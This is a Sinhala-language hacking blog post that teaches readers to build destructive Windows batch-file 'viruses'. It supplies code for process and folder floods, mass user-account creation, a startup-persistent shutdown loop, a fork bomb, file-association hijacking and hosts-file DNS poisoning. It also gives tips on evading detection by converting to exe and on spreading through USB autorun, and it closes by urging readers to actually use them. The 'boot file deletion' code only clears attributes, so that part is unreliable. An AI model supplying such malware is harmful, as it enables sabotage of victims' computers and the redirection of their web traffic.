BATCH Programming මගින් VIRUSES නිර්මාණය කිරීම.

හොඳයි හුඟ දවසකින් Hacking ගැන මුකුත් දැම්මේ නෑ මොකද Programming Post වලට මුල්තැන දීල හිටපු නිසා. ඒ මොකද HACKER කෙනෙක් වෙන්නනම් ඉතින් ඉස්සරලාම ඊට අවශ්‍ය දැනුම රැස්කරගෙන ඉන්න වෙනව නැත්නම් hack වෙන්නේ අපිවමයි. අන්න එතනදී HACKER කෙනෙක් විදිහට අවම වශයෙන් එක් Programming language එකක්වත් හැසිරවීමේ හැකියාව තිබීම ඉතාමත් වැදගත්. හරි අපි මාතෘකාව දිහාවට හැරෙමුකො.

මේ BATCH files කියන්නේ windows පරිඝණක වල ක්‍රියාත්මක කල හැකි ".bat" කියන extensions එක සහිත files විශේෂයකට. අපිට පුලුවන් මේ BATCH FILES හරහා ඉතාමත් විනාශකාරී VIRUSES නිර්මාණය කරන්න. හරි මං දැන් දෙනව ඔයාලට code එකක් ඒ code එක notepad එකකට paste කරල අපි ඒක save කරන්න ඔනෙ .bat කියන extension එක සහිතව (උදා H4CK3R.bat) ඒ වගේම මතක ඇතුව all files කියල දෙන්න. දැන් VIRUSES එක attack එකට සූදානම්. නමුත් ඊට කලින් අපි පොඩ්ඩක් මෙ BATCH files වල ක්‍රියාකාරීත්වය ගැන පොඩි අවදානයක් යොමු කරල ඉමු. 

මොනවද මේ Batch Files කියන්නේ? 

අපි පොඩි උදාහරනයකින් පටන් ගමු, මුලින්ම ඔයාලගේ command prompt(cmd) එක open කරගන්නකෝ ඊට පස්සේ cmd එකෙන් desktop එකට එන්න (cd desktop කියල type කරල enter කරානම් හරි). 

දැන් පිලිවලින් එකින් එක මේ commands ටික දෙන්නකො. 

md blah1

cd blah1

md blah2

පලවෙනි එකෙන් කරන්නේ blah1 කියන නමින් ඔයාලගේ desktop එකේ folder එකක් හදනව. දෙවනි command එකෙන් වෙන්නේ cmd එකෙන් blah1 කියන folder එක ඇතුලට යනව. තුන්වෙනි එකෙන් වෙන්නේ blah1 කියන folder එක ඇතුලේ blah2 කියල folder එකක් හැදෙනව. දැන් ඔයාලගේ desktop එකේ බැලුවොත් පෙනෙයි මේ විදිහේ folders හැදිල තියනව. හරි cmd එක වහල blah1 folder එක මකල දාන්න.

දැන් අපි මේකම වෙනත් ක්‍රමයකට කරන්නයි යන්නේ. මේ commands තුනම notpad එකකට ගන්නකො ඊට පස්සේ ඔයාලට කැමති නමක් දීල මේක save කරන්න හැබැයි මතක ඇතුව extension එක වෙන්න ඔනෙ .bat (desktop එකේම save කරන්න)

දැන් ඔයාල ඒ .bat file එක double click කරොත් පෙනෙයි අපි කලින් cmd එක මගින් commands තුනකින් කරපු දේ මේ .bat file එක මගින් එකවරම සිද්ද කරල තියනව. ඒ තියන්නෙ ඔයාගේ desktop එකේ blah1 කියල folder එකක් සහ ඒක ඇතුලේ blah2 කියල folder එකක් නිර්මානය වෙලා තියනව. 

ඉතින් ඔයාලට තේරෙනව ඇති මේ batch එකක් මගින් පුලුවන් අපට cmd commands කීපයක් පිලිවලින් automatically execute කරගන්න. 

මොනවද මේ batch viruses වලට කරන්න පුලුවන් දේවල්? 

අපට පුලුවන් මේ batch viruses බාවිතා කරල windows files නැත්නම් system files මකල දාන්න සහ වෙනස් කරන්න, සම්පූර්න disk එකක් format කරන්න, තොරතුරු සොරාගන්න ඒවගේම disable firewalls, open ports, සම්පූර්නයෙන්ම registry එක වෙනස් කරන්න විනාස කරල දාන්න සහ මේ වගේ තව ගොඩක් දේවල්. 

හොඳයි අපි දැන් සරල code එකකින් පටන් ගමු, පහත දැක්වෙක code එක notpad එකකට copy කරගන save කරගන්න. මතක තියා ගන්න අපි save කරන්න ඔන .bat කියල. (H4CK3R.bat) 

1. Application Bomber

@echo off 
:x 
start winword
start mspaint 
start notepad
start write
start cmd 
start explorer
start control
start calc 
goto x 

මෙහි @echo off මගින් සිදුකරනුයේ batch files එක executed වන අවස්තාවේදී commands නොපෙන්වා ක්‍රියා කිරීම සඳහායි. මෙහි x variable එක මගින් සිදුකරනුයේ මෙම batch files එක මගින් සිදුකරන ක්‍රියාවලිය නැවත නැවත සිදුකිරීමයි.
මෙම batch files එක execute කිරීමෙන් සිදුවන්නේ windows applications කීපයක්(notpad, cmd, etc...) open වීම සහ එය නැවත නැවත නොකඩවා සිදුවීමයි. මේ නිසා පරිඝණකයේ ක්‍රියාකාරීත්ව අඩපන වීමක් සිදුවේ. 

2. Folder flooder

@echo off
:x
md %random%
goto x

මෙහි ඇති %random% variable එක මගින් සිදුවන්නේ එකින් එකට වෙනස් numbers නිර්මාණය කිරීමයි. මෙම code එක මගින් අපිට පුලුවන් විශාල folders පුමාණයක් එකවර නිර්මානය කරගන්න. උදාහරනයක් විදිහට මෙම batch file එක අපි c drive එක ඇතුලේ වගේ ක්‍රියාත්මක කලොත් විනාඩි කීපයකින් c drive එක සම්පුර්ණයෙන්ම folders වලින් පුරවන්න පුලුවන්. එමගිනුත් පරිඝණකයේ න්‍රියාකාරීත්ව අඩපන වීමක් සිදුවෙනව

2.1.User account flooder

@echo off
:x
net user %random%
goto x

මෙ code එකෙන් පුලුවන් අපි කලින් සිදුකරා වගේ folders වෙනුවට එකින් එකට වෙනස් user accounts විශාල ප්‍රමාණයක් නිර්මාණය කරන්න. 


3.Shutdown Virus

copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”
shutdown -s -t 00

(1 සහ 2 line වල ඇති 'anything' වෙනුවට මෙම batch file එක save කිරීමේදී  යොදා ගන්නා නමම ඇතුලත් කරන්න.) 
මෙහි ඇති පලවන සහ දෙවන lines වලින් කරන්නේ මෙම batch file එක පරිඝණකයේ Startup folder එකට copy කරගන්නවා එම නිසා පරිඝණකය boot කරන සෑම අවස්තාවකම මෙම batch file එක ක්‍රියාත්මක වෙනව. එහිදී සිදුවන්නේ මෙහි තුන්වන line එකට අනුව පරිඝණකය සැනින් shutdown වීමයි. මෙම code එක windows xp සඳහා වන අතර මෙය windows 7 සඳහා බාවිතා කිරීමට path එක මෙ ලෙස වෙනස් කල යුතුයි C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

සෑම අවස්තාවකම පරිඝණකය න්‍රියාත්මක කීරීමේදී Startup folder හී ඇති batch file එක ක්‍රියාත්මක වී පරීඝණකය සැනින් නැවත shutdown වෙනව මේක නැවැත්වීමට windows Safe Mode හරහා පරිඝණකය boot කරල Startup folder එකේ තියන batch file එක delete කරල දාන්න ඔනෙ. 


4. Deleting boot files

windows xp වලදී c drive එකේ තියනව file එකක් 'ntldr' කියල මේ file එක අනිව තියෙන්න ඔනේ windows boot වෙන්නනම් බැරිවෙලාවත් මේක නැතිවුවොත් කිසිවිටකත් පරිඝණකය boot වෙන්නේ නෑ. අපි batch file එකක් හදමු මේ file එක පරිඝණකයෙන් ඉවත් කරන්න. 

attrib -S -R -H C:\ntldr 

මේක තමයි code එක. මේ batch එක එකපාරක් පරිඝණකයේ ක්‍රියාත්මක වුනොත් කිසිවිටක්ත් පරිඝණකය නැවත boot වෙන්නේ නම් නෑ. සාමාන්‍යයෙන් victim කෙනක් කරන්නේ මේ අවස්තාවෙදී නැවත windows install කීරීමයි. 


5. Fork Bomb

%0|%0 

පෙනුමට ගොඩක් පොඩි වුනාට මෙයා ගොඩක් බයානකයි. මේ code එකෙන් කරන්නේ ඉක්මනින්ම විශාල processes ප්‍රමානයක් එකවර ක්‍රියාත්මක කරනව එමගින් windows සම්පූරිණයෙන්ම අඩපන වෙනවා. 


6. Extension Changer

@echo off
assoc .txt=anything
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
මේකනම් තනිකරම පරිඝණකය පිස්සු වට්ටන batch file එකක්. මේකෙන් වෙන දේ තමයි අපි දන්නව පරිඝණකයේ තියන සෑම file එකකටම වගේ එයට වෙන්වූ file type එකක් තියනව(උදා- .exe .txt .jpeg .png .mpeg) ඉතින් මේ batch file එකෙන් කරන්නේ මේ extensions සියල්ල ‘anything’ කියන file type එකට වෙනස් කරනව. ආ.. anything කිවුවේ ඔයාලට කැමති එකක් දාගන්න පුලුවන්. මේ batch file එක ක්‍රියාත්මක කලොත් එතනින් පස්සේ .exe .txt .jpeg .png .mpeg මෙවැනි files open කරන එකනම් ලේසි වෙන්නේ නෑ. 


7. DNS Poisoning

ඔන්න මේ ගැනනම් මං කලින් කියල දීල තියනව ඒ තමයි DNS. දන්නේ නැත්නම් මෙතනින් ගිහින් බලන්නකෝ. 

@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts

'xxx.xxx.xxx.xxx' මෙතනට ඔයාලට දාන්න ඔන IP එකත්. 'www.anything.com' මෙතනට ඔයාලට ඔන web address එකත් දෙන්න. 


තවදෙයක් තමයි මේ batch viruses ගොඩක් වෙලාවට anitiviruses වලින් හඳුන ගන්නේ නෑ. ඒ වගේම තමයි මං මේ ඔයාලට දීල තියෙන්නේ ගොඩක් ප්‍රසිද්ද batch viruses කීපයක්. ඔයාලට පුලුවන් මීට වඩා හොඳ viruses නිර්මානය කරන්න ඒකට ඔයාලට ඕන කරන්නේ DOS commands දැනගැනීම සහ තර්කාණු කූලව එවා බාවිතා කීරීමේ හැකියාව පමනයි. 


Batch Viruses වල තියන දුර්වලතා -:

1. Victim ට පුලුවන් මේ batch file ලේසියෙන්ම notepad එකකින් open කරල බලන්න.
2. batch viruse එක ක්‍රියාත්මක වන අවස්තාවේ command prompt එක pops up වීමක් සිදුවෙනව ඒ නිසා ලේසියෙන්ම හඳුනගන්න පුලුවන්.

ඉතින් ඔයාලට මේ දුර්වලතා මගහැර ගන්න පුලුවන් batch file එක exe file එකක් විදිහට convert කරල. ඔයාලට පුලුවන් පහතින් Batch To Exe converter එක Download කරගන්න. 

pw is : H4CK3R#

ආ.. තවදෙයක් මේ batch viruses අපිට පුලුවන් pen drive එකක් හරහා පරිඝණක වලට ආසාධනය කරන්න මේ විදිහට. -:

Step 1: notepad එකක් Open කරල මේ code එක type කරගන්න. 

[autorun]

open=anything.bat

Icon=anything.ico

    ඊට පස්සේ ‘autorun.inf’ කියල save කරන්න 'anything' කියන තැනට batch virus එකේ නම.

Step 2: ඊට පස්සේ මේ ‘autorun.inf’ එකයි ‘anything.bat’(ඔයාගේ virus එක) එකයි pendrive එකට දාන්න. දැන් pendrive එක windows පරිඝණකයකට සම්බන්ද කරපු ගමන් වැඩේ ගොඩ.

මේ දෙවල් ඉගන ගන්න විතරක්ම නෙමේ කරලත් බලන්න හොඳද(Not only educational purpose). හරි හරි මං ගියා එහෙනම් ඊලඟ post එකෙත් හම්බෙමු.